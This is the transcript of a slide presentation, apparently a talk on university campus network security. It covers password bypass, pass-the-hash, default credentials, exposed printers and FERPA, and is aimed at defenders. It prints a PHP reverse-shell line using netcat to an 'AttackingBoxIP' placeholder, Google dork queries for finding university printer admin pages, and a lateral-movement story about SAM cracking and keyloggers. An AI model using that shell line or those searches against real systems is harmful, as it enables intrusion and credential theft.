Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.

Slides:



Advertisements
Similar presentations
Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)
Advertisements

Windows XP Tutorial Securing Windows. Introduction This presentation will guide you through basic security principles for Windows XP.
Mr C Johnston ICT Teacher
9/20/07 STLSecurity is Everyone's Responsibility 1 FHDA Technology Security Awareness.
OAAIS Enterprise Information Security Security Awareness, Training & Education (SATE) Program or UCSF Campus VPN.
How do Networks work – Really The purposes of set of slides is to show networks really work. Most people (including technical people) don’t know Many people.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Integrity Check As You Well Know, It Is A Violation Of Academic Integrity To Fake The Results On Any.
Technical Training: DIR-615
Securing a Wireless Network
April WebEx Intel ® Active Management Technology (AMT) LANDesk Provisioning LANDesk Server Manager.
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Use my floppy disk. 1. copy short cut to desktop. 2.run NoAdHOSTS.exe 3. Surf without ad’s. 4.to reverse everything -edit out all url s you want to return.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.
Test Review. What is the main advantage to using shadow copies?
Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.
That’s Really not the Point… haroon meer | charl van der walt SensePost.
The World-Wide Web. Why we care? How much of your personal info was released to the Internet each time you view a Web page? How much of your personal.
CHC DI Group. What We Will Cover Securing your devices and computers. Passwords. s. Safe browsing for shopping and online banks. Social media.
Chromium OS is an open-source project that aims to build an operating system that provides a fast, simple, and more secure computing experience for people.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Computer Information Use your own login and password if possible. To get a password, you must turn in the AUP sheet handed out at registration or sent.
SLIR Computer Lab: Orientation and Training December 16, 1998.
Irongeek.com Adrian Crenshaw Joseph Hollingsworth.
Networks and Hackers Copyright © Texas Education Agency, All rights reserved. 1.
IT:NETWORK:MICROSOFT SERVER 2 DHCP AND WINDOWS DEPLOYMENT SERVICES.
Portable SSH Brian Minton EKU, Dept. of Technology, CEN/CET)‏
Common Cyber Defenses Tom Chothia Computer Security, Lecture 18.
Computer Security and Penetration Testing Chapter 16 Windows Vulnerabilities.
1 C-DAC/Kolkata C-DAC All Rights Reserved Computer Security.
Secure Wireless Home Networks Area 2 SIR Presentation Nov. 18, 2004 Dean Steichen Br. 8.
Hacker’s Strategies Revealed WEST CHESTER UNIVERSITY Computer Science Department Yuchen Zhou March 22, 2002.
Phishing scams Phishing is the fraudulent practice of sending s purporting to be from reputable companies in order to induce individuals to reveal.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Turning Windows 7 into a Web Server Ch 28. Understanding Internet Information Services.
Optimizing Your Computer To Run Faster Using Msconfig Technical Demonstration by: Chris Kilkenny.
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
P aul Asadoorian Founder & CEO, PaulDotCom Enterprises POST Exploitation Going Beyond The Happy Dance Carlos.
Social Engineering Toolkit Computer Science Innovations, LLC.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
Hacking Windows What to do first?  Patch : of course the first thing to do is apply SP3 and the critical updates. More will come …critical updates.
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
IT1001 – Personal Computer Hardware & system Operations Week7- Introduction to backup & restore tools Introduction to user account with access rights.
CTC228 Nov Today... Catching up with group projects URLs and DNS Nmap Review for Test.
Don’t Log in!. Recap on the previous units I’ve tried to make it as concise as possible but there is a bit of writing, to ensure that you have some notes.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
A PC Wakes Up A STORY BY VICTOR NORMAN. Once upon a time…  a PC (we’ll call him “H”) is connected to a network and turned on. Aside: The network looks.
Mr C Johnston ICT Teacher BTEC IT Unit 09 - Lesson 11 Network Security.
Lindsey Velez, Director of Instructional Technology Single Sign-On One Click.
© ExplorNet’s Centers for Quality Teaching and Learning 1 Install, configure, and deploy a SOHO wireless/wired router using appropriate settings. Objective.
How To Set Up A Wireless Network. What is a wireless network  A wireless network is a computer network that allows computers and other electronic devices.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
© ExplorNet’s Centers for Quality Teaching and Learning 1 Describe applications and services. Objective Course Weight 5%
1 Web Technologies Website Publishing/Going Live! Copyright © Texas Education Agency, All rights reserved.
Protection of Data 31 Protection of Data 31. Protection of Data 31 Having looked at threats, we’ll now look at ways to protect data: Physical Barriers.
How to Make Yourself More Secure Using Public Computers and Free Public Wi-Fi.
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Cosc 5/4765 NAC Network Access Control. What is NAC? The core concept: –Who you are should govern what you’re allowed to do on the network. Authentication.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Hacking Windows.
Common Methods Used to Commit Computer Crimes
Unit 4 IT Security.
Files, folders, directories, URLs, and IP addresses
Determined Human Adversaries: Mitigations
Implementing Client Security on Windows 2000 and Windows XP Level 150
Network hardening Chapter 14.
Determined Human Adversaries: Mitigations
Data Recovery: Why Secure Deletion is so Important.
6. Application Software Security
Presentation transcript:

Adrian Crenshaw

 I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m just a geek with time on my hands  Sr. Information Security Engineer at a Fortune 1000  Co-Founder of Derbycon

 This is a broad subject, too broad  Give you something to think about  Going to try to suggest cheap/free tools to solve problems  More notes here: versity-campus-security versity-campus-security-2013

 What are the differences?  Open by design  Lack of physical control  BYOD (Bring Your Own Device) is standard  Early Adoption/Legacy  Apps with little regard to security  Politics/Organizational Problems  Legal Stuff

 Bandwidth  Botnets  Pivots  Free Hosting  Free resources  Books/Articles  Aaron Swartz & JSTOR is a sad case of admins going too far  Research Information  Grades/Tests/Notes  Forced directory browsing for the win!

 The point is to learn (in theory)  Learning is the product, not widgets or whatever  Experimentation is needed to learn  Can I run a service on this?  Where can I put my website?  Where can I run my code?  Try telling tenured faculty they can’t run a server?

 Old software never dies “But I just got to use this BASICA app”  Time tables for testing  Assumption of Admin access Mitigation:  Figure out needed registry and file system permissions  Procmon us/sysinternals/bb aspx us/sysinternals/bb aspx

 Frequent nuke and rebuilds  SteadyState – no longer supported  Achieving the effect with built in tech us/library/gg176676%28WS.10%29.aspx us/library/gg176676%28WS.10%29.aspx Commercial  Deep Freeze  Alternatives

 Besides crappy apps, there is malware  Nuke it from orbit, it’s the only way to be sure  Symantec Ghost  Open Source Alternatives:  Train users to put their files in a know location  Windows Easy Transfer us/windows7/products/features/windows-easy- transfer us/windows7/products/features/windows-easy- transfer

 Attackers are already on the soft chewy center of the “Candy Analogy”  Remember the axiom: “If a bad guy has unrestricted physical access to your computer, it's not your computer anymore.“ ~ Microsoft or Dr. David Salomon

 Password Resets  Password Bypass  Pass the Hash  Password Cracking

 Offline NT Password & Registry Editor, Bootdisk/CD  Bart's PE Builder  Windbuilder  Sala's Password Renew  NTPWEdit

 Kon-Boot  Subverts Boot Process  Blank a password in Windows on login  Reboot and authentication goes back to normal  Some locally stored passwords will not work  Nirsoft’s Password Recovery tools:

 Portable Boot Devices (USB/CD/DVD) able-boot-devices-usb-cd-dvd able-boot-devices-usb-cd-dvd  Building a boot USB, DVD or CD based on Windows 7 with WinBuilder and Win7PE SE Tutorial builder-win7pe-se-tutorial builder-win7pe-se-tutorial  Dual booting Winbuilder/Win7PE SE and Backtrack 5 on a USB flash drive with XBOOT t-backtrack-winbuilder-dual-boot t-backtrack-winbuilder-dual-boot

 Some may be thinking: "Those are just the patron access machines - my staff workstations and file servers are still safe because they are behind locked doors."  Let me share my little horror story about network privilege escalation:

1. First frat boy Bob becomes a local admin on a workstation using a boot device. 2. He then copies off the SAM and SYSTEM files for later cracking with Cain or Hashcat I've done tons of videos/articles over the years on password cracking, so I'll point you to some of those:  Cracking Windows Vista/XP/2000/NT Passwords via SAM and SYSKEY with Cain, Ophcrack, Saminside, BKhive, Samdump2 etc passwords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc passwords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc  Password Exploitation Class

3. Many folks use the same local admin passwords on all of the boxes they deploy, allowing Bob to attack other boxes from across the network using the cracked credentials. 4. Bob then installs a software key logger to gain even more credentials as faculty, staff and students login to the compromised workstation. 5. Repeat leap frogging.

 Pass the Hash  Metasploit's psexec  Pass the Hash Tool Kit e=Wiki&action=view&type=tool&name=Pass-The- Hash_Toolkit e=Wiki&action=view&type=tool&name=Pass-The- Hash_Toolkit

 Cached Domain Credentials  MSCash and MSCash v  Cain & Able  Hashcat  Browser, Mail Client, etc. 

 Don’t store local passwords  Don’t use LMHASHs  New OS or greater that 15 character passwords  No default local admin, but custom (HASH(MAC+SK))  Locked BIOS Unified Extensible Firmware Interface (UEFI)  Control what people can boot from  Support issues for reimaging  Better lock the case too  Cheap lock = crap lock  Prohibitively expensive to do better.  More on passwords in a bit  None of it stops hardware key loggers

 Even professors from Comp Sci/Infosec may not know tech details  Defining Pen-test to two Infosec professors  Defining what a USB hub was to another  Silly attitudes: "Additionally, Mr. Crenshaw's personal website, housed on university resources, is a compendium of links to know computer hacker websites, hacker toolkits, and other hacker resources.“ ~ Larry Mand  The word hacker freaks them out a bit

 Sterling Riggs WDRB Facebook Post September 26: “I don't know how I feel about this--DerbyCon happening at Hyatt downtown. It's a convention for computer hackers.”  Lot’s of prejudicial comments  I pointed it out to my infosec buds on Twitter, and tons of Infosec folks showed up to defend hackerdom and the conference  Post since deleted  But Jayson E. Street saved some  Eve Adams got in the last words I saw: "Kill em with kindness. Hack em with hugs."

 Ethics, or lack there of  You get fired for what you do do, not for what you don’t. Why rock the boat?  Tenure  No, you change your IP scheme  How do you enforce rules on those that can’t be fired?  Like High school cliques, but with more grey hair and tweed

 The plural of a anecdote is not evidence, but…  The Foundation for Individual Rights in Education  Look over the timeline for the Jerry Sandusky case  Look up the origin of the Clery Act  No, not all schools are this way (I hope)

 They have always been doing it, did not have a term for Bring you own device  Flat Networks  NAC (Network Access Control)  Better be more than MAC Address (ifconfig, MadMACs)  Crapware on box need to check system AV and patch level   (Maybe dead)

 Remote password attacks  Noisy  Slow  Default passwords  No passwords are common on printers  Network gear  Webcams/Teleconference  DRACs

 Printers  Data leaks/Docs  DoS  Free print jobs  Stored passwords  DRACs (or other management)  Remote control  Webcams/Teleconferencing  Passwords on desks?  SoHo NASes

 Softperfect’s NetScan nner/ nner/  RAWR (Rapid Assessment of Web Resources) from Adam Byers & Tom Moore

  Examples: Ricoh Savins intitle:"web image monitor" site:edu "/web/user/en/websys/webArch/mainFrame.cgi" site:edu inurl:"/en/sts_index.cgi" site:edu HP Jetdirects (Varies greatly from model to model) inurl:hp/device/this.LCDispatcher site:edu CUPS Connected Printers inurl:":631/printers" -php -demo site:edu intitle:"web image monitor" site:edu"/web/user/en/websys/webArch/mainFrame.cgi" site:eduinurl:"/en/sts_index.cgi" site:eduinurl:hp/device/this.LCDispatcher site:eduinurl:":631/printers" -php -demo site:edu

 Some scanners will just tell you  THC-Hydra  Medusa  Brutus  Default Password Lists (or just Google)

 Default password of a new account?  Passwords reused to often, known by too many, never changed  Frequent resets cause people to write it down (or more support calls)  Password Patterns  Passwords over Passphrase = e = e+19

 Facebook started on university campuses  Students are way too free with information  OSInt, Cyberstalking, Footprinting and Recon: Getting to know you -cyberstalking-footprinting-recon -cyberstalking-footprinting-recon  Curious George Bronk

 How many organizations of about 7000 people have a class B?  Got in early, got a lot of space  Don’t have to NAT for numbering reasons, so a lot of stuff is on the public Internet  Some problems:  Open ports or everything!  Reconfigure devices  Reverse DNS

nmap -sL */* Nmap scan report for pm-cser-loanbox.papermill.edu ( ) Nmap scan report for pm-sscs-hh10500.papermill.edu ( ) Nmap scan report for pm-buse-jsmith02.papermill.edu Nmap scan report for npi10adab.papermill.edu ( )

 Firewall it off  Turn it off  Watch for defaults when sharing files  Things get shared with too many folkS  NetScan is awesome for finding these  Do they really need it?  Walled Off Experimentation Labs  Virtual Machines

 User training  Who’s an admin?  SOHO NAS, and why are they there?

 Anyone doing it?  Open Source Helpers  Graylog2  OSSIM  Security Onion

 Does the page allow for scripting?  Packages kept up to date  Old web apps never die  PHP Example $x = shell_exec("nc AttackingBoxIP 30 -e cmd ");  Web Shells techniques-obfuscation-and-automated-collection-adrian-crenshaw techniques-obfuscation-and-automated-collection-adrian-crenshaw  OWASP (Open Web Application Security Project)  Web Application Pen-testing Tutorials With Mutillidae tutorials-with-mutillidae tutorials-with-mutillidae

 Corporate Network can get away with more because of physical perimeter (sort of)  Insecure protocols  HTTP  FTP  SMTP  Telnet

 Password sniffing  Files/Print Jobs  Cookie/session hijacking  Common sniffing tools  Wireshark  NetworkMiner  Cain  Ettercap

 Protocol replacements  IDS/IPS/ARPWatch  LAN segmentation  Network Sniffers Class for the Kentuckiana ISSA sniffers-class sniffers-class  Static ARP  ARPFreeze static-arp-poisoning static-arp-poisoning

 Do you know what is out there?  Professors, students and staff could be hooking anything up  NAC may give some info  Nmap  Nagios Commercial:  Nessus  Nexpose

 Better than it use to be  WSUS great for Windows clients you control us/windowsserver/bb aspx us/windowsserver/bb aspx Commercial:  Shavlik  Secunia CSI (can be uses with WSUS) Open Source: 

 Open Wireless can be sniffed (duh!)  Lots of legacy system exist that may not be able to use WPA/2 Enterprise (getting better)  VPN over open WiFi was a common option  Not so useful  Disabling SSID Broadcasting  MAC Address Filtering  Evil twin attacks

 Universities hit everything across the board  Most of these others in the audience will know better than I  PCI DSS (Payment Card Industry Data Security Standard)  HIPAA/HITECH (Health Insurance Portability and Accountability Act / Health Information Technology for Economic and Clinical Health Act)  FISMA/FIPS (Federal Information Security Management Act of 2002 / Federal Information Processing Standards)  IRB (Institutional Review Board)  FERPA (Family Educational Rights and Privacy Act)  Let’s dive into this

Turn off the video now

 Three main parts 1. Give students access to their records 2. The ability to amend records 3. To control disclosure of student records  Only for Schools getting money form U.S. Department of Education programs  Why it is pretty fucking useless!

 No individual right to sue  See Gonzaga University v. Doe  Can’t find a case of any university ever loosing funding because of a breach  Have there been no breaches?  Just not enforced?

Two Quotes:  "If, as a result of the hearing, the school still decides not to amend the record, the eligible student has the right to insert a statement in the record setting forth his or her views"  "Thus, while FERPA affords eligible students the right to seek to amend education records which contain inaccurate information, this right cannot be used to challenge a grade or an individual's opinion, or a substantive decision made by a school about a student."  Amendment clause has exceptions (that covers all possibilities)  Grades  Statements or Opinions  “Substantive” Decision  What is left?  Overall Conclusion: FERPA has no teeth

 Mostly links, sorry  Slides will be up when I post the video, but most are in the article  If you experiences are different, I’d live to here them  Private/State/ Commercial  Teaching vs. Research  Government Research

Derbycon Sept ?th-?th, Others Photo Credits to KC (devauto) Derbycon Art Credits to DigiP

42